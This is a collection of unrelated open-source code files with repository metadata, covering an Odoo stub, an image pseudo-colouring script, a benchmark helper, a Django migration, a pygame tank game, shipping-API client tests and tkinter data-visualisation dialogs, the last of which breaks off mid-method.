9ce51d32d9e61c53a2d027bce33679c610fa8a49 | 1c8d13d1ae081188fcbde3c327164fe77ae8590b | /account_tax_office/__init__.py | eaacf07f67402a9252f480269eaa52b0a068be25 | [] | no_license | aaltinisik/customaddons | 5f624008b167b860b183f17f0812f5adafc8908e | c04e2b9730db07848c153d8245d2df65ec4e2c8f | refs/heads/12.0 | 2023-08-31T23:31:05.802190 | 2023-08-28T06:50:25 | 2023-08-28T06:50:25 | 21,519,767 | 15 | 21 | null | 2023-09-08T08:45:44 | 2014-07-05T12:40:07 | Python | UTF-8 | Python | false | false | 990 | py | # -*- encoding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2015, Eska Yazilim ve Danismanlik A.S.
# http://www.eskayazilim.com.tr
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import models
| [
"onurugur@gitlab.com"
] | onurugur@gitlab.com |
2840783a2139a211a3aaf526a16a654a7698046a | e4d935c8062319d0f718082ec32871943717574f | /DEP_C6/example_6.py | 2c4752df60a414e7fa7019c591845ce3b0066e3a | [] | no_license | zarearia/DigitalImageProcessing-Notebook | 58290c6e041554eae75775ab9f2dc8ba82035aff | d0ae8a5950d2a1afe849c51987463157e0ef2b1e | refs/heads/master | 2022-08-30T01:47:18.818796 | 2020-05-30T10:55:17 | 2020-05-30T10:55:17 | 268,061,048 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | import numpy as np
import cv2 as cv
import matplotlib.pyplot as plt
np.set_printoptions(threshold=np.inf)
# Mark: reading and converting img to value between 0 and 1
img = cv.imread('/Users/ariazare/Projects/Python/DEP_C4/Fig0438(a)(bld_600by600).tif')
img = cv.cvtColor(img, cv.COLOR_RGB2GRAY)
img = np.array(img, 'float32')
# img /= 255
# Mark: creating RGB sin funcs
def creat_sin_func(array, multiple, plus=0):
for i in range(0, array.shape[0]):
array[i] = np.abs(np.sin((i/255) * np.pi * multiple + plus))
return array
blue_func = np.zeros((256), 'float32')
blue_func = creat_sin_func(blue_func, 1)
red_func = np.zeros((256), 'float32')
red_func = creat_sin_func(red_func, 1, 1)
green_func = np.zeros((256), 'float32')
green_func = creat_sin_func(green_func, 1, 2)
# Mark: creating RGB image
def mix_gray_image_with_color_sin_finc(img, color_func):
img_l = np.copy(img)
num = np.array([0], 'int')
for i in range(0, img_l.shape[0]):
for j in range(0, img_l.shape[1]):
num[0] = img_l[i, j]
img_l[i, j] = color_func[num[0]]
return img_l
blue_only_img = np.zeros(img.shape, 'int')
blue_only_img = mix_gray_image_with_color_sin_finc(img, blue_func)
green_only_img = np.zeros(img.shape, 'int')
green_only_img = mix_gray_image_with_color_sin_finc(img, green_func)
red_only_img = np.zeros(img.shape, 'int')
red_only_img = mix_gray_image_with_color_sin_finc(img, red_func)
color_img = np.zeros((img.shape[0], img.shape[1], 3))
color_img[:, :, 0] = red_only_img
color_img[:, :, 1] = green_only_img
color_img[:, :, 2] = blue_only_img
plt.imshow(img)
plt.show()
plt.imshow(color_img)
plt.show()
| [
"ariazare@outlook.com"
] | ariazare@outlook.com |
b586bc73c8abf2ab0858af5c05cb97731f7d31fa | a366db0f2a117e0a8cf923e9b4de5c643155e047 | /bench/state.py | 08dad6e8fdc6e4fca68111ef1035197012e312ac | [] | no_license | genome/nessy-server | d2ff6aa7bb692f50e5cabb435a380670be75b2b9 | f8207310d33bf259130df806b4d759ef1a883e56 | refs/heads/master | 2021-01-10T18:59:38.910186 | 2014-12-29T22:11:16 | 2014-12-29T22:11:16 | 15,785,645 | 0 | 0 | null | 2014-12-29T22:11:16 | 2014-01-10T01:57:38 | Python | UTF-8 | Python | false | false | 2,115 | py | import collections
import datetime
class State(object):
UNSET = object()
def __init__(self, resource_names):
self._state_index = collections.defaultdict(set)
self._state_index['released'].update(resource_names)
self._resource_index = {r: 'released' for r in resource_names}
self._claim_urls = {}
self.transition_count = 0
self._request_times = collections.defaultdict(list)
def get_claim_url(self, resource):
return self._claim_urls[resource]
def resources_in_states(self, *states):
blah = [self._state_index[s] for s in states]
return set.union(*blah)
def set_resource_state(self, resource, state, claim_url=UNSET):
self.transition_count += 1
old_state = self._resource_index.pop(resource)
self._resource_index[resource] = state
self._state_index[old_state].remove(resource)
self._state_index[state].add(resource)
if claim_url is not self.UNSET:
if claim_url is None and resource in self._claim_urls:
self._claim_urls.pop(resource)
else:
self._claim_urls[resource] = claim_url
def noop(self):
self.transition_count += 1
def start_timer(self):
self._begin_time = datetime.datetime.now()
def stop_timer(self):
self._end_time = datetime.datetime.now()
@property
def _total_runtime(self):
return (self._end_time - self._begin_time).total_seconds()
def report(self):
tag_times = {
tag: {
'mean': sum(times) / len(times),
'number': len(times),
'rps': len(times) / sum(times),
}
for tag, times in self._request_times.iteritems()
}
return {
'total_requests': self.transition_count,
'total_runtime': self._total_runtime,
'rps': self.transition_count / self._total_runtime,
'times': tag_times,
}
def register_request(self, tag, seconds):
self._request_times[tag].append(seconds)
| [
"mark.m.burnett@gmail.com"
] | mark.m.burnett@gmail.com |
ee009b5bf52bb7f8428a2d67a049f5f7e5db0bc5 | fa140027a23f85d3f2399f4fdbcef27f62f973ab | /product_release_notes/migrations/0004_auto_20170821_2340.py | 2cd4a878420b429d29dbebd6adfb8914fd4046c2 | [
"MIT"
] | permissive | bjh63742/product-release-notes | 10de8a13ae19311a5a2b82cd7f1599e70b64bb69 | f0068b4fe3d5e6b23144c69094456acd700becab | refs/heads/master | 2022-12-16T18:30:51.001381 | 2020-09-16T14:06:31 | 2020-09-16T14:06:31 | 295,582,583 | 0 | 0 | null | 2020-09-15T01:35:58 | 2020-09-15T01:35:58 | null | UTF-8 | Python | false | false | 604 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-21 23:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product_release_notes', '0003_client_icon'),
]
operations = [
migrations.RemoveField(
model_name='client',
name='current_version',
),
migrations.AlterField(
model_name='releasenote',
name='version',
field=models.CharField(blank=True, db_index=True, max_length=255),
),
]
| [
"nick.r.romano@gmail.com"
] | nick.r.romano@gmail.com |
fad0a9d402c2a9c652ef1ffc6eb8328b5bf559c7 | 5257652fc34ec87fe45d390ba49b15b238860104 | /nn_interpretation/nn_unique/get_nn_unique.py | 0aefadbf1cc44379399634748c270b52f7fc9a45 | [] | no_license | thekingofall/alzheimers_parkinsons | cd247fa2520c989e8dd853ed22b58a9bff564391 | 4ceae6ea3eb4c58919ff41aed8803855bca240c8 | refs/heads/master | 2022-11-30T22:36:37.201334 | 2020-08-12T01:23:55 | 2020-08-12T01:23:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | buddies_nn=set(open('buddies_nn.txt','r').read().strip().split('\n'))
sig_svm=set(open('sig_svm.txt','r').read().strip().split('\n'))
nn_unique=buddies_nn-sig_svm
outf=open('nn_unique.txt','w')
outf.write('\n'.join(nn_unique)+'\n')
| [
"annashcherbina@gmail.com"
] | annashcherbina@gmail.com |
d75327ed3eb1eb548c678947125403d00ff95754 | dc6ddb01df98303fd901f2280c3f290250a6c6e0 | /gui codings/create new window.py | 9b5b58c8be2d5a49d290e3d44a85df571cc6652b | [] | no_license | 051109zol/myschoolworkcodings | 4ac07adc4af1c440ddee6f95652c4d66ab09d3fa | 672db8df023c6405387697fce711cfc3ccd4789e | refs/heads/main | 2023-03-30T09:31:34.815066 | 2021-03-15T15:23:47 | 2021-03-15T15:23:47 | 348,017,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | from tkinter import *
from PIL import ImageTk, Image
root = Tk ()
root.title ("WEWEWEW")
root.iconbitmap("pewds_qmL_icon.ico")
def open ():
global my_img
top = Toplevel()
top.title ("miniOn")
top.iconbitmap("pewds_qmL_icon.ico")
my_img = ImageTk.PhotoImage(Image.open("gamba/anomaly1.jpg"))
my_label = Label (top, image=my_img).pack()
btn2 = Button (top, text = "Bye Minion!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!", command = top.destroy).pack()
btn = Button(root, text = "Click me to see minion!!!!!!", command = open).pack()
root.mainloop()
| [
"noreply@github.com"
] | 051109zol.noreply@github.com |
392775843ef9a141cf72d2566d5ca45de26aa634 | 5aa27e52058d014bf4fb784d63a70c7d1f565330 | /Games/Tanks.py | 49cfe3c4acab326b37343a174e0e53d14d9bffe0 | [] | no_license | a5vh/AdPro | 2e5c5f952bb917d3b98c277a512670b67ce0718f | 595c1c3e5088ae3cfb85078282dffceb44c1901e | refs/heads/master | 2020-04-11T00:16:37.088549 | 2019-05-05T19:24:53 | 2019-05-05T19:24:53 | 161,381,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,458 | py | import sys, time, random, math, pygame
from pygame.locals import *
from MyLibrary import *
class Bullet():
def __init__(self,position):
self.alive = True
self.color = (250,20,20)
self.position = Point(position.x,position.y)
self.velocity = Point(0,0)
self.rect = Rect(0,0,4,4)
self.owner = ""
def update(self,ticks):
self.position.x += self.velocity.x * 10.0
self.position.y += self.velocity.y * 10.0
if self.position.x < 0 or self.position.x > 800 \
or self.position.y < 0 or self.position.y > 600:
self.alive = False
self.rect = Rect(self.position.x, self.position.y, 4, 4)
def draw(self,surface):
pos = (int(self.position.x), int(self.position.y))
pygame.draw.circle(surface, self.color, pos, 4, 0)
def fire_cannon(tank):
position = Point(tank.turret.X, tank.turret.Y)
bullet = Bullet(position)
angle = tank.turret.rotation
bullet.velocity = angular_velocity(angle)
bullets.append(bullet)
play_sound(shoot_sound)
return bullet
def player_fire_cannon():
bullet = fire_cannon(player)
bullet.owner = "player"
bullet.color = (30,250,30)
def enemy_fire_cannon():
bullet = fire_cannon(e)
bullet.owner = "enemy"
bullet.color = (250,30,30)
class Tank(MySprite):
def __init__(self,tank_file="tank.png",turret_file="turret.png"):
MySprite.__init__(self)
self.load(tank_file, 50, 60, 4)
self.speed = 0.0
self.scratch = None
self.float_pos = Point(0,0)
self.velocity = Point(0,0)
self.turret = MySprite()
self.turret.load(turret_file, 32, 64, 4)
self.fire_timer = 0
def update(self,ticks):
#update chassis
MySprite.update(self,ticks,150)
self.rotation = wrap_angle(self.rotation)
self.scratch = pygame.transform.rotate(self.image, -self.rotation)
angle = wrap_angle(self.rotation)
self.velocity = angular_velocity(angle+dir)
self.float_pos.x += self.velocity.x
self.float_pos.y += self.velocity.y
#warp tank around screen edges (keep it simple)
if self.float_pos.x < -50: self.float_pos.x = 800
elif self.float_pos.x > 800: self.float_pos.x = -50
if self.float_pos.y < -60: self.float_pos.y = 600
elif self.float_pos.y > 600: self.float_pos.y = -60
#transfer float position to integer position for drawing
self.X = int(self.float_pos.x)
self.Y = int(self.float_pos.y)
#update turret
self.turret.position = (self.X,self.Y)
self.turret.last_frame = 0
self.turret.update(ticks,100)
self.turret.rotation = wrap_angle(self.turret.rotation)
angle = self.turret.rotation+90
self.turret.scratch = pygame.transform.rotate(self.turret.image, -angle)
def draw(self,surface):
#draw the chassis
width,height = self.scratch.get_size()
center = Point(width/2,height/2)
surface.blit(self.scratch, (self.X-center.x, self.Y-center.y))
#draw the turret
width,height = self.turret.scratch.get_size()
center = Point(width/2,height/2)
surface.blit(self.turret.scratch, (self.turret.X-center.x, self.turret.Y-center.y))
def __str__(self):
return MySprite.__str__(self) + "," + str(self.velocity)
class EnemyTank(Tank):
def __init__(self,tank_file="enemy_tank.png",turret_file="enemy_turret.png"):
Tank.__init__(self,tank_file,turret_file)
def update(self,ticks):
MySprite.update(self,ticks,100)
self.rotation = wrap_angle(self.rotation)
self.scratch = pygame.transform.rotate(self.image, -self.rotation)
angle = wrap_angle(self.rotation)
self.velocity = angular_velocity(angle-90)
self.float_pos.x += self.velocity.x
self.float_pos.y += self.velocity.y
#warp tank around screen edges (keep it simple)
if self.float_pos.x < -50: self.float_pos.x = 800
elif self.float_pos.x > 800: self.float_pos.x = -50
if self.float_pos.y < -60: self.float_pos.y = 600
elif self.float_pos.y > 600: self.float_pos.y = -60
#transfer float position to integer position for drawing
self.X = int(self.float_pos.x)
self.Y = int(self.float_pos.y)
#update turret
self.turret.position = (self.X,self.Y)
self.turret.last_frame = 0
self.turret.update(ticks,100)
self.turret.rotation = wrap_angle(self.turret.rotation)
angle = self.turret.rotation+90
self.turret.scratch = pygame.transform.rotate(self.turret.image, -angle)
def draw(self,surface):
Tank.draw(self,surface)
#this function initializes the game
def game_init():
global screen, backbuffer, font, timer, player_group, player, \
enemy_tank, bullets, crosshair, crosshair_group, enemy_group, explosion
pygame.init()
screen = pygame.display.set_mode((800,600))
backbuffer = pygame.Surface((800,600))
pygame.display.set_caption("Tank Battle Game")
font = pygame.font.Font(None, 30)
timer = pygame.time.Clock()
pygame.mouse.set_visible(False)
#load mouse cursor
crosshair = MySprite()
crosshair.load("crosshair.png")
crosshair_group = pygame.sprite.GroupSingle()
crosshair_group.add(crosshair)
#create player tank
player = Tank()
player.float_pos = Point(400,300)
enemy_group = pygame.sprite.Group()
#create enemy tanks
for n in range(0, 5):
enemy_tank = EnemyTank()
enemy_tank.float_pos = Point(random.randint(50,760), random.randint(50, 550))
enemy_tank.rotation = random.randint(100, 180)
enemy_group.add(enemy_tank)
#create bullets
bullets = list()
# this function initializes the audio system
def audio_init():
global shoot_sound, boom_sound, move_sound
#initialize the audio mixer
pygame.mixer.init()
#load sound files
shoot_sound = pygame.mixer.Sound("shoot.wav")
boom_sound = pygame.mixer.Sound("boom.wav")
move_sound = pygame.mixer.Sound("move.wav")
# this function uses any available channel to play a sound clip
def play_sound(sound):
channel = pygame.mixer.find_channel(True)
channel.set_volume(0.5)
channel.play(sound)
#main program begins
dir = 90
wait = 3
game_init()
audio_init()
game_over = False
player_score = 0
enemy_score = 0
last_time = 0
mouse_x = mouse_y = 0
#main loop
while True:
timer.tick(30)
ticks = pygame.time.get_ticks()
#reset mouse state variables
mouse_up = mouse_down = 0
mouse_up_x = mouse_up_y = 0
mouse_down_x = mouse_down_y = 0
#event section
for event in pygame.event.get():
if event.type == QUIT: sys.exit()
elif event.type == MOUSEMOTION:
mouse_x,mouse_y = event.pos
move_x,move_y = event.rel
elif event.type == MOUSEBUTTONDOWN:
mouse_down = event.button
mouse_down_x,mouse_down_y = event.pos
elif event.type == MOUSEBUTTONUP:
mouse_up = event.button
mouse_up_x,mouse_up_y = event.pos
#get key states
keys = pygame.key.get_pressed()
if keys[K_ESCAPE]: sys.exit()
elif keys[K_LEFT] or keys[K_a]:
#calculate new direction velocity
player.rotation -= 2.0
elif keys[K_RIGHT] or keys[K_d]:
#calculate new direction velocity
player.rotation += 2.0
elif keys[K_s] or keys[K_DOWN]:
#Reverse velocity
play_sound(move_sound)
if dir == -90 and wait < 1:
dir = 90
wait = 3
elif wait < 1:
dir = -90
wait = 3
wait -= 1
elif keys[K_p] and game_over:
dir = 90
wait = 3
game_init()
game_over = False
player_score = 0
elif player_score == 5:
game_over = True
#fire cannon!
if keys[K_SPACE] or mouse_up > 0:
if ticks > player.fire_timer + 500:
player.fire_timer = ticks
player_fire_cannon()
play_sound(move_sound)
#update section
if not game_over:
crosshair.position = (mouse_x,mouse_y)
crosshair_group.update(ticks)
#point tank turret toward crosshair
angle = target_angle(player.turret.X,player.turret.Y,
crosshair.X + crosshair.frame_width/2,
crosshair.Y + crosshair.frame_height/2)
player.turret.rotation = angle
#move tank
player.update(ticks)
#update enemies
for e in enemy_group:
e.update(ticks)
for e in enemy_group:
if ticks > e.fire_timer + 1000:
e.fire_timer = ticks
enemy_fire_cannon()
#update bullets
for bullet in bullets:
bullet.update(ticks)
if bullet.owner == "player":
for e in enemy_group:
if pygame.sprite.collide_rect(bullet, e):
player_score += 1
bullet.alive = False
play_sound(boom_sound)
enemy_group.remove(e)
elif bullet.owner == "enemy":
if pygame.sprite.collide_rect(bullet, player):
enemy_score += 1
bullet.alive = False
play_sound(boom_sound)
game_over = True
#drawing section
backbuffer.fill((100,100,20))
for bullet in bullets:
bullet.draw(backbuffer)
for e in enemy_group:
e.draw(backbuffer)
player.draw(backbuffer)
crosshair_group.draw(backbuffer)
screen.blit(backbuffer, (0,0))
if not game_over:
print_text(font, 0, 0, "PLAYER " + str(player_score))
print_text(font, 700, 0, "ENEMY " + str(enemy_score))
else:
print_text(font, 0, 0, "PLAYER " + str(player_score))
print_text(font, 700, 0, "ENEMY " + str(enemy_score))
print_text(font, 300, 380, "GAME OVER")
print_text(font, 300, 400, "PRESS P TO PLAY AGAIN!")
pygame.display.update()
#remove expired bullets
for bullet in bullets:
if bullet.alive == False:
bullets.remove(bullet) | [
"august.hummert5@gmail.com"
] | august.hummert5@gmail.com |
68082290653ffed19788bd000c3c0e180d32b37d | f200b971bd542b626dddfca31fb9f72323ece616 | /estafeta/tests/test_core.py | ed5add17d09127f9ede433fd491b24c59840d920 | [
"MIT"
] | permissive | Solunest/pyestafeta | 836d2ad5ce957407e42ecf3cfd76d10698fbea81 | cd24cea4973f5184f4cc7e72a653de8b22e32f69 | refs/heads/master | 2021-01-01T15:34:51.389726 | 2017-07-18T23:37:55 | 2017-07-18T23:37:55 | 97,652,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,498 | py | import unittest
import estafeta
from estafeta import EstafetaClient
class CoreTests(unittest.TestCase):
def setUp(self):
super().setUp()
def create_core(self):
estafeta_client = EstafetaClient()
with self.assertRaises(estafeta.core.EstafetaEmptyField):
print(estafeta_client.password)
estafeta.user = 'Usuario1'
estafeta.password = '1GCvGIu$'
estafeta.id = '25'
with self.assertRaises(estafeta.core.EstafetaEmptyField):
print(estafeta_client.url_tracking)
with self.assertRaises(estafeta.core.EstafetaEmptyField):
print(estafeta_client.url_label)
estafeta.production = False
self.assertEqual(estafeta_client.url_tracking, 'https://trackingqa.estafeta.com/Service.asmx?wsdl')
self.assertEqual(estafeta_client.url_label,
'https://labelqa.estafeta.com/EstafetaLabel20/services/EstafetaLabelWS?wsdl')
estafeta.production = True
self.assertEqual(estafeta_client.url_tracking, 'https://trackingqa.estafeta.com/Service.asmx?wsdl')
self.assertEqual(estafeta_client.url_label,
'https://label.estafeta.com/EstafetaLabel20/services/EstafetaLabelWS?wsdl')
self.assertEqual(estafeta_client.user, 'Usuario1')
self.assertNotEqual(estafeta_client.user, '1GCvGIu$')
self.assertEqual(estafeta_client.password, '1GCvGIu$')
self.assertEqual(estafeta_client.id, '25')
| [
"luigi.lahi@gmail.com"
] | luigi.lahi@gmail.com |
5fee948bb6d78254887e2386f43243c10338ff41 | 94af8241244d6910b96654ffa1bef39131c23844 | /dialog.py | f56c8b5d551159fdfb292ffcaa515b5944be28aa | [] | no_license | eodecker/Data-Visualization-GUI | 248aac7c9e27470d925320df4f4484e0e97ab592 | b81eca1c77da587364a784ab991e623aefc3320a | refs/heads/master | 2020-12-10T17:16:11.548572 | 2020-01-13T17:55:38 | 2020-01-13T17:55:38 | 233,657,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,742 | py | # CS 251
# Spring 2019
# Eli Decker
# Project 4
import display
import tkinter as tk
import numpy as np
class Dialog(tk.Toplevel):
def __init__(self, parent, title = None):
tk.Toplevel.__init__(self, parent)
self.transient(parent)
if title:
self.title(title)
self.parent = parent
self.result = None
body = tk.Frame(self)
self.initial_focus = self.body(body)
body.pack(padx=5, pady=5)
self.buttonbox()
self.grab_set()
if not self.initial_focus:
self.initial_focus = self
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.geometry("+%d+%d" % (parent.winfo_rootx()+50,
parent.winfo_rooty()+50))
self.initial_focus.focus_set()
self.wait_window(self)
#
# construction hooks
def body(self, master):
# create dialog body. return widget that should have
# initial focus. this method should be overridden
pass
def buttonbox(self):
# add standard button box. override if you don't want the
# standard buttons
box = tk.Frame(self)
w = tk.Button(box, text="OK", width=10, command=self.ok, default=tk.ACTIVE)
w.pack(side=tk.LEFT, padx=5, pady=5)
w = tk.Button(box, text="Cancel", width=10, command=self.cancel)
w.pack(side=tk.LEFT, padx=5, pady=5)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.cancel)
box.pack()
#
# standard button semantics
def ok(self, event=None):
if not self.validate():
self.initial_focus.focus_set() # put focus back
return
self.withdraw()
self.update_idletasks()
self.apply()
self.cancel()
def cancel(self, event=None):
# put focus back to the parent window
self.parent.focus_set()
self.destroy()
#
# command hooks
def validate(self):
return 1 # override
def apply(self):
pass # override
class EntryBox(Dialog):
# You will need to override the body method and create the Entry widget there,
# using a StringVar object to handle setting and getting the text from the Entry widget.
def __init__(self, parent, dataObject, title = None):
self.minimum = 1
self.maximum = 10
self.hitCancel = True
self.x = None
self.y = None
self.z = None
self.colorOption = "Black"
self.sizeOption = 10
self.data = dataObject
self.headers = self.data.get_headers()
self.dataCols = []
self.colorMenu = None
self.xMenu = None
self.yMenu = None
self.zMenu = None
self.sizeMenu = None
self.colors = ["black", "blue", "red", "green"]
self.sizes = ["5", "10", "15", "20", "25"]
Dialog.__init__(self, parent)
def body(self, master):
frame = tk.Frame(self)
frame2 = tk.Frame(self)
frame.pack(side=tk.LEFT)
xLabel = tk.Label(frame, text="X", width=20)
yLabel = tk.Label(frame, text="Y", width=20)
zLabel = tk.Label(frame, text="Z", width=20)
sizeLabel = tk.Label(frame2, text="Size", width=20)
colorLabel = tk.Label(frame2, text="Color", width=20)
self.colorMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
self.xMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.yMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.zMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.sizeMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
xLabel.pack(side=tk.TOP, pady=5)
self.xMenu.pack(side=tk.TOP, padx=5)
yLabel.pack(side=tk.TOP, pady=5)
self.yMenu.pack(side=tk.TOP, padx=5)
zLabel.pack(side=tk.TOP, pady=5)
self.zMenu.pack(side=tk.TOP, padx=5)
frame2.pack(side=tk.RIGHT)
sizeLabel.pack(side=tk.TOP, pady=5)
self.sizeMenu.pack(side=tk.TOP, padx=5)
colorLabel.pack(side=tk.TOP, pady=5)
self.colorMenu.pack(side=tk.TOP, padx=5)
#color options
# for color in self.colors:
# self.colorMenu.insert(tk.END, color)
# for size in self.sizes:
# self.sizeMenu.insert(tk.END, size)
for header in self.headers:
self.xMenu.insert(tk.END, header)
self.yMenu.insert(tk.END, header)
self.zMenu.insert(tk.END, header)
self.colorMenu.insert(tk.END, header)
self.sizeMenu.insert(tk.END, header)
def apply(self):
xSelection = self.xMenu.curselection()
if len(xSelection) > 0:
self.dataCols.append(self.headers[xSelection[0]])
ySelection = self.yMenu.curselection()
if len(ySelection) > 0:
self.dataCols.append(self.headers[ySelection[0]])
zSelection = self.zMenu.curselection()
if len(zSelection) > 0:
self.dataCols.append(self.headers[zSelection[0]])
else:
self.dataCols.append(None)
colorSelection = self.colorMenu.curselection()
if len(colorSelection) > 0:
self.dataCols.append(self.headers[colorSelection[0]])
else:
self.dataCols.append(None)
sizeSelection = self.sizeMenu.curselection()
if len(sizeSelection) > 0:
self.dataCols.append(self.headers[sizeSelection[0]])
else:
self.dataCols.append(None)
def getdataCols(self):
return self.dataCols
# returns number of points
def getX(self):
return self.x
def getY(self):
return self.y
def getZ(self):
return self.z
def getColor(self):
return self.colorOption
def getSize(self):
return self.sizeOption
# tells whether user hit cancel button
def userCancelled(self):
if self.hitCancel:
self.numPoints = 100
return True
else:
self.numPoints = 100
return False
class LinRegEntry(Dialog):
# You will need to override the body method and create the Entry widget there,
# using a StringVar object to handle setting and getting the text from the Entry widget.
def __init__(self, parent, dataObject, title = None):
self.minimum = 1
self.maximum = 10
self.hitCancel = True
self.x = None
self.y = None
self.colorOption = "Black"
self.sizeOption = 10
self.data = dataObject
self.headers = self.data.get_headers()
self.dataCols = []
self.colorMenu = None
self.xMenu = None
self.yMenu = None
self.sizeMenu = None
self.colors = ["black", "blue", "red", "green"]
self.sizes = ["5", "10", "15", "20", "25"]
Dialog.__init__(self, parent)
def body(self, master):
frame = tk.Frame(self)
frame2 = tk.Frame(self)
frame.pack(side=tk.LEFT)
xLabel = tk.Label(frame, text="X", width=20)
yLabel = tk.Label(frame, text="Y", width=20)
self.xMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.yMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
xLabel.pack(side=tk.TOP, pady=5)
self.xMenu.pack(side=tk.TOP, padx=5)
yLabel.pack(side=tk.TOP, pady=5)
self.yMenu.pack(side=tk.TOP, padx=5)
for header in self.headers:
self.xMenu.insert(tk.END, header)
self.yMenu.insert(tk.END, header)
def apply(self):
xSelection = self.xMenu.curselection()
if len(xSelection) > 0:
self.dataCols.append(self.headers[xSelection[0]])
ySelection = self.yMenu.curselection()
if len(ySelection) > 0:
self.dataCols.append(self.headers[ySelection[0]])
def getdataCols(self):
return self.dataCols
# returns number of points
def getX(self):
return self.x
def getY(self):
return self.y
def getColor(self):
return self.colorOption
def getSize(self):
return self.sizeOption
# tells whether user hit cancel button
def userCancelled(self):
if self.hitCancel:
self.numPoints = 100
return True
else:
self.numPoints = 100
return False
class PCAdialog(Dialog):
def __init__(self, parent, dataObject, title = None):
self.data = dataObject
self.headers = self.data.get_headers()
self.dataCols = []
Dialog.__init__(self, parent)
def body(self, master):
frame = tk.Frame(self)
frame2 = tk.Frame(self)
frame.pack(side=tk.LEFT)
label = tk.Label(frame, text="Choose Headers for PCA Analysis", width=30)
self.headerList = tk.Listbox( frame, selectmode=tk.MULTIPLE, exportselection=0)
label.pack(side=tk.TOP, pady=5)
self.headerList.pack(side=tk.TOP, padx=5)
for header in self.headers:
self.headerList.insert(tk.END, header)
def apply(self):
selection = self.headerList.curselection()
if len(selection) > 0:
for item in selection:
self.dataCols.append(self.headers[item])
def getdataCols(self):
return self.dataCols
class PCAtable(Dialog):
def __init__(self, parent, dataObject, title = None):
self.data = dataObject
self.headers = self.data.get_headers()
self.pcadata = self.data.get_specific_col_data(self.headers)
self.evec = self.data.get_eigenvectors()
self.eval = self.data.get_eigenvalues()
evalsum = np.sum(self.eval)
counter = 0
self.cumulativeList = []
for item in self.eval:
temp = item/evalsum
counter = counter + temp
self.cumulativeList.append(counter)
Dialog.__init__(self, parent)
def body(self, master):
print("**********")
print(self.evec)
print("*****-------*****")
print(self.eval)
print(self.data.get_original_headers())
# length = self.evec.shape[0]
length = self.data.get_num_points()
width = self.evec.shape[0]+1
standardLabels = ["E-vec", "E-val", "Cumulative"]
topLabels = standardLabels + self.data.get_original_headers()
for i in range(self.evec.shape[0]): #Rows
c = tk.Label(master, text="%s" % (self.headers[i]))
c.grid(row=i+1,column=0)
# val = tk.Label(master, text="%f" % (self.eval.item((i, j))))
for j in range(len(topLabels)): #Columns
label = tk.Label(master, text="%s" % (topLabels[j]))
if j > 2:
b = tk.Label(master, text="%f" % (self.evec.item((i, j-3))))
b.grid(row=i+1, column=j)
label.grid(row=0, column=j)
vals = tk.Label(master, text="%f" % (self.eval.item((i))))
vals.grid(row=i+1, column=1)
cumulative = tk.Label(master, text="%f" % (self.cumulativeList[i]))
cumulative.grid(row=i+1, column=2)
class PCAdialogPlot(Dialog):
def __init__(self, parent, dataObject, title = None):
self.data = dataObject
self.headers = self.data.get_headers()
self.dataCols = []
Dialog.__init__(self, parent)
def body(self, master):
frame = tk.Frame(self)
frame2 = tk.Frame(self)
frame.pack(side=tk.LEFT)
xLabel = tk.Label(frame, text="X", width=20)
yLabel = tk.Label(frame, text="Y", width=20)
zLabel = tk.Label(frame, text="Z", width=20)
sizeLabel = tk.Label(frame2, text="Size", width=20)
colorLabel = tk.Label(frame2, text="Color", width=20)
self.colorMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
self.xMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.yMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.zMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
self.sizeMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
xLabel.pack(side=tk.TOP, pady=5)
self.xMenu.pack(side=tk.TOP, padx=5)
yLabel.pack(side=tk.TOP, pady=5)
self.yMenu.pack(side=tk.TOP, padx=5)
zLabel.pack(side=tk.TOP, pady=5)
self.zMenu.pack(side=tk.TOP, padx=5)
frame2.pack(side=tk.RIGHT)
sizeLabel.pack(side=tk.TOP, pady=5)
self.sizeMenu.pack(side=tk.TOP, padx=5)
colorLabel.pack(side=tk.TOP, pady=5)
self.colorMenu.pack(side=tk.TOP, padx=5)
#color options
# for color in self.colors:
# self.colorMenu.insert(tk.END, color)
# for size in self.sizes:
# self.sizeMenu.insert(tk.END, size)
for header in self.headers:
self.xMenu.insert(tk.END, header)
self.yMenu.insert(tk.END, header)
self.zMenu.insert(tk.END, header)
self.colorMenu.insert(tk.END, header)
self.sizeMenu.insert(tk.END, header)
def apply(self):
xSelection = self.xMenu.curselection()
if len(xSelection) > 0:
self.dataCols.append(self.headers[xSelection[0]])
ySelection = self.yMenu.curselection()
if len(ySelection) > 0:
self.dataCols.append(self.headers[ySelection[0]])
zSelection = self.zMenu.curselection()
if len(zSelection) > 0:
